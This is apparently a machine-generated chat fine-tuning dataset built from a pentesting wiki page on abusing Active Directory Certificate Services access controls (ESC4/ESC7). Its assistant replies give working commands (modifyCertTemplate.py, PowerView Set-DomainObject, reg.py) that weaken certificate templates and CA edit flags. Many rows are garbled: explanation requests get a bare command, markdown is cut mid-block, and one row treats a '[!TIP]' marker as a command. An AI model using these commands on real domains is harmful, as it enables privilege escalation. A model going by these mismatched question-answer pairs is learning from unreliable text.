for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 1. Disable Manager Approval Requirement?", "response": "modifyCertTemplate.py -template templateName -value 2 -property mspki-enrollment-flag \"$DOMAIN/$USER:$PASSWORD\"", "metadata": {"corpus_index": 7, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 2. Disable Authorized Signature Requirement"}, {"role": "assistant", "content": "modifyCertTemplate.py -template templateName -value 0 -property mspki-ra-signature \"$DOMAIN/$USER:$PASSWORD\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 2. Disable Authorized Signature Requirement", "response": "modifyCertTemplate.py -template templateName -value 0 -property mspki-ra-signature \"$DOMAIN/$USER:$PASSWORD\"", "metadata": {"corpus_index": 8, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 2. Disable Authorized Signature Requirement?"}, {"role": "assistant", "content": "modifyCertTemplate.py -template templateName -value 0 -property mspki-ra-signature \"$DOMAIN/$USER:$PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 2. Disable Authorized Signature Requirement?", "response": "modifyCertTemplate.py -template templateName -value 0 -property mspki-ra-signature \"$DOMAIN/$USER:$PASSWORD\"", "metadata": {"corpus_index": 8, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 3. Enable SAN Specification?"}, {"role": "assistant", "content": "modifyCertTemplate.py -template templateName -add enrollee_supplies_subject -property \"msPKI-Certificate-Name-Flag\" \"$DOMAIN/$USER:$PASSWORD\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 3. Enable SAN Specification?", "response": "modifyCertTemplate.py -template templateName -add enrollee_supplies_subject -property \"msPKI-Certificate-Name-Flag\" \"$DOMAIN/$USER:$PASSWORD\"", "metadata": {"corpus_index": 9, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 3. Enable SAN Specification?"}, {"role": "assistant", "content": "modifyCertTemplate.py -template templateName -add enrollee_supplies_subject -property \"msPKI-Certificate-Name-Flag\" \"$DOMAIN/$USER:$PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 3. Enable SAN Specification?", "response": "modifyCertTemplate.py -template templateName -add enrollee_supplies_subject -property \"msPKI-Certificate-Name-Flag\" \"$DOMAIN/$USER:$PASSWORD\"", "metadata": {"corpus_index": 9, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 4. Edit Certificate Application Policy Extension in the context of penetration testing"}, {"role": "assistant", "content": "modifyCertTemplate.py -template templateName -value \"'1.3.6.1.5.5.7.3.2', '1.3.6.1.5.2.3.4'\" -property \"pKIExtendedKeyUsage\" \"$DOMAIN/$USER:$PASSWORD\"\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate these sensitive access control entries. At the time of writing (October 21st, 2021) BloodHound doesn't support (yet) enumeration of these access controls. PowerView can be used to modify the template.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 4. Edit Certificate Application Policy Extension in the context of penetration testing", "response": "modifyCertTemplate.py -template templateName -value \"'1.3.6.1.5.5.7.3.2', '1.3.6.1.5.2.3.4'\" -property \"pKIExtendedKeyUsage\" \"$DOMAIN/$USER:$PASSWORD\"\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate these sensitive access control entries. At the time of writing (October 21st, 2021) BloodHound doesn't support (yet) enumeration of these access controls. PowerView can be used to modify the template.\n\n``powershell", "metadata": {"corpus_index": 10, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 4. Edit Certificate Application Policy Extension"}, {"role": "assistant", "content": "modifyCertTemplate.py -template templateName -value \"'1.3.6.1.5.5.7.3.2', '1.3.6.1.5.2.3.4'\" -property \"pKIExtendedKeyUsage\" \"$DOMAIN/$USER:$PASSWORD\"\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate these sensitive access control entries. At the time of writing (October 21st, 2021) BloodHound doesn't support (yet) enumeration of these access controls. PowerView can be used to modify the template.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 4. Edit Certificate Application Policy Extension", "response": "modifyCertTemplate.py -template templateName -value \"'1.3.6.1.5.5.7.3.2', '1.3.6.1.5.2.3.4'\" -property \"pKIExtendedKeyUsage\" \"$DOMAIN/$USER:$PASSWORD\"\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate these sensitive access control entries. At the time of writing (October 21st, 2021) BloodHound doesn't support (yet) enumeration of these access controls. PowerView can be used to modify the template.\n\n``powershell", "metadata": {"corpus_index": 10, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 4. Edit Certificate Application Policy Extension?"}, {"role": "assistant", "content": "> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate these sensitive access control entries. At the time of writing (October 21st, 2021) [BloodHound](../../recon/bloodhound/index) doesn't support (yet) enumeration of these access controls. [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) can be used to modify the template."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 4. Edit Certificate Application Policy Extension?", "response": "> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate these sensitive access control entries. At the time of writing (October 21st, 2021) [BloodHound](../../recon/bloodhound/index) doesn't support (yet) enumeration of these access controls. [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) can be used to modify the template.", "metadata": {"corpus_index": 11, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for 4. edit certificate application policy extension. 4. Edit Certificate Application Policy Extension"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for 4. edit certificate application policy extension. 4. Edit Certificate Application Policy Extension", "metadata": {"corpus_index": 11, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 2. Disable Manager Approval Requirement"}, {"role": "assistant", "content": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity tempalteName -XOR @{'mspki-enrollment-flag'=2} -Verbose"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 2. Disable Manager Approval Requirement", "response": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity tempalteName -XOR @{'mspki-enrollment-flag'=2} -Verbose", "metadata": {"corpus_index": 12, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 2. Disable Manager Approval Requirement"}, {"role": "assistant", "content": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity tempalteName -XOR @{'mspki-enrollment-flag'=2} -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 2. Disable Manager Approval Requirement", "response": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity tempalteName -XOR @{'mspki-enrollment-flag'=2} -Verbose", "metadata": {"corpus_index": 12, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 3. Disable Authorized Signature Requirement"}, {"role": "assistant", "content": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -Set @{'mspki-ra-signature'=0} -Verbose"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 3. Disable Authorized Signature Requirement", "response": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -Set @{'mspki-ra-signature'=0} -Verbose", "metadata": {"corpus_index": 13, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 3. Disable Authorized Signature Requirement?"}, {"role": "assistant", "content": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -Set @{'mspki-ra-signature'=0} -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 3. Disable Authorized Signature Requirement?", "response": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -Set @{'mspki-ra-signature'=0} -Verbose", "metadata": {"corpus_index": 13, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 4. Enable SAN Specification"}, {"role": "assistant", "content": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -XOR @{'mspki-certificate-name-flag'=1} -Verbose"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 4. Enable SAN Specification", "response": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -XOR @{'mspki-certificate-name-flag'=1} -Verbose", "metadata": {"corpus_index": 14, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 4. Enable SAN Specification?"}, {"role": "assistant", "content": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -XOR @{'mspki-certificate-name-flag'=1} -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 4. Enable SAN Specification?", "response": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -XOR @{'mspki-certificate-name-flag'=1} -Verbose", "metadata": {"corpus_index": 14, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 5. Edit Certificate Application Policy Extension in the context of penetration testing"}, {"role": "assistant", "content": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose\n```\n\n:::\n\n> [!WARNING]\n>\n> If sensitive access entries are identified, creativity will be the best ally.\n> \n> Currently, the best resources for manually abusing this are\n> \n> * Abusing weak ACL on Certificate Templates (by daemon0cc0re)\n> * AD-CS The Certified Pre Owned Attacks (by HTTP418)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 5. Edit Certificate Application Policy Extension in the context of penetration testing", "response": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose\n```\n\n:::\n\n> [!WARNING]\n>\n> If sensitive access entries are identified, creativity will be the best ally.\n> \n> Currently, the best resources for manually abusing this are\n> \n> * Abusing weak ACL on Certificate Templates (by daemon0cc0re)\n> * AD-CS The Certified Pre Owned Attacks (by HTTP418)", "metadata": {"corpus_index": 15, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 5. Edit Certificate Application Policy Extension"}, {"role": "assistant", "content": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose\n```\n\n:::\n\n> [!WARNING]\n>\n> If sensitive access entries are identified, creativity will be the best ally.\n> \n> Currently, the best resources for manually abusing this are\n> \n> * Abusing weak ACL on Certificate Templates (by daemon0cc0re)\n> * AD-CS The Certified Pre Owned Attacks (by HTTP418)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 5. Edit Certificate Application Policy Extension", "response": "Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local\" -Identity templateName -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose\n```\n\n:::\n\n> [!WARNING]\n>\n> If sensitive access entries are identified, creativity will be the best ally.\n> \n> Currently, the best resources for manually abusing this are\n> \n> * Abusing weak ACL on Certificate Templates (by daemon0cc0re)\n> * AD-CS The Certified Pre Owned Attacks (by HTTP418)", "metadata": {"corpus_index": 15, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Access controls - Certificate Authority (ESC7) work?"}, {"role": "assistant", "content": "There are two attacks paths for this scenario:\n\n1. If an attacker gains control over a principal that's able to edit the CA server registries (e.g. local admin, or ManageCA?), and is able to restart the CertSrv service on the server, he can make the CA vulnerable to ESC6 and exploit that\n2. Alternatively, if an attacker gains control over a principal that has the ManageCA right over the CA object, he can remotely obtain the ManageCertificates right and with those two rights combined, approve pending certificate requests, subverting the \"CA certificate manager approval\" protection (referred to as PREVENT4 in the research whitepaper)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Access controls - Certificate Authority (ESC7) work?", "response": "There are two attacks paths for this scenario:\n\n1. If an attacker gains control over a principal that's able to edit the CA server registries (e.g. local admin, or ManageCA?), and is able to restart the CertSrv service on the server, he can make the CA vulnerable to ESC6 and exploit that\n2. Alternatively, if an attacker gains control over a principal that has the ManageCA right over the CA object, he can remotely obtain the ManageCertificates right and with those two rights combined, approve pending certificate requests, subverting the \"CA certificate manager approval\" protection (referred to as PREVENT4 in the research whitepaper).", "metadata": {"corpus_index": 16, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Access controls - Certificate Authority (ESC7)"}, {"role": "assistant", "content": "There are two attacks paths for this scenario:\n\n1. If an attacker gains control over a principal that's able to edit the CA server registries (e.g. local admin, or ManageCA?), and is able to restart the CertSrv service on the server, he can make the CA vulnerable to ESC6 and exploit that\n2. Alternatively, if an attacker gains control over a principal that has the ManageCA right over the CA object, he can remotely obtain the ManageCertificates right and with those two rights combined, approve pending certificate requests, subverting the \"CA certificate manager approval\" protection (referred to as PREVENT4 in the research whitepaper)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Access controls - Certificate Authority (ESC7)", "response": "There are two attacks paths for this scenario:\n\n1. If an attacker gains control over a principal that's able to edit the CA server registries (e.g. local admin, or ManageCA?), and is able to restart the CertSrv service on the server, he can make the CA vulnerable to ESC6 and exploit that\n2. Alternatively, if an attacker gains control over a principal that has the ManageCA right over the CA object, he can remotely obtain the ManageCertificates right and with those two rights combined, approve pending certificate requests, subverting the \"CA certificate manager approval\" protection (referred to as PREVENT4 in the research whitepaper).", "metadata": {"corpus_index": 16, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Access controls - ESC7 - Exposing to ESC6"}, {"role": "assistant", "content": "If sufficient rights are obtained over the Certificate Authority (ManageCA?, local admin account, ...) an attacker could remotely edit the registries, enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, restart the CertSvc service, and abuse ESC6 (CA configuration abuse).\n\n::: tabs\n\n=== UNIX-like\n\nThe attack can be carried out from UNIX-like systems as follows.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Access controls - ESC7 - Exposing to ESC6", "response": "If sufficient rights are obtained over the Certificate Authority (ManageCA?, local admin account, ...) an attacker could remotely edit the registries, enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, restart the CertSvc service, and abuse ESC6 (CA configuration abuse).\n\n::: tabs\n\n=== UNIX-like\n\nThe attack can be carried out from UNIX-like systems as follows.\n\n```bash", "metadata": {"corpus_index": 17, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Access controls - ESC7 - Exposing to ESC6?"}, {"role": "assistant", "content": "If sufficient rights are obtained over the Certificate Authority (ManageCA?, local admin account, ...) an attacker could remotely edit the registries, enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, restart the CertSvc service, and abuse ESC6 (CA configuration abuse).\n\n::: tabs\n\n=== UNIX-like\n\nThe attack can be carried out from UNIX-like systems as follows.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Access controls - ESC7 - Exposing to ESC6?", "response": "If sufficient rights are obtained over the Certificate Authority (ManageCA?, local admin account, ...) an attacker could remotely edit the registries, enable the EDITF_ATTRIBUTESUBJECTALTNAME2 attribute, restart the CertSvc service, and abuse ESC6 (CA configuration abuse).\n\n::: tabs\n\n=== UNIX-like\n\nThe attack can be carried out from UNIX-like systems as follows.\n\n```bash", "metadata": {"corpus_index": 17, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of query flags"}, {"role": "assistant", "content": "reg.py \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@$\"ADCS_IP\" query -keyName 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-NAME\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy' -v editflags"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of query flags", "response": "reg.py \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@$\"ADCS_IP\" query -keyName 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-NAME\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy' -v editflags", "metadata": {"corpus_index": 18, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for query flags"}, {"role": "assistant", "content": "reg.py \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@$\"ADCS_IP\" query -keyName 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-NAME\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy' -v editflags"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for query flags", "response": "reg.py \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@$\"ADCS_IP\" query -keyName 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-NAME\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy' -v editflags", "metadata": {"corpus_index": 18, "category": "web", "source_file": "docs/src/ad/movement/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is write flags?"}, {"role": "assistant", "content": "reg.py \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@$\"ADCS_IP\" add-keyName 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-NAME\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy' -v editflags -vd NEW_VALUE\n``\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object.\n\nThen, PSPKI (PowerShell) can be used to modify the CA object (RSAT is needed on the machine where PSPKI is run).\n\n``powershell\nCertify.exe cas"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is write flags?", "response": "reg.py \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@$\"ADCS_IP\" add-keyName 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-NAME\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy' -v editflags -vd NEW_VALUE\n``\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used to enumerate info about the CAs, including access rights over the CA object.\n\nThen, PSPKI 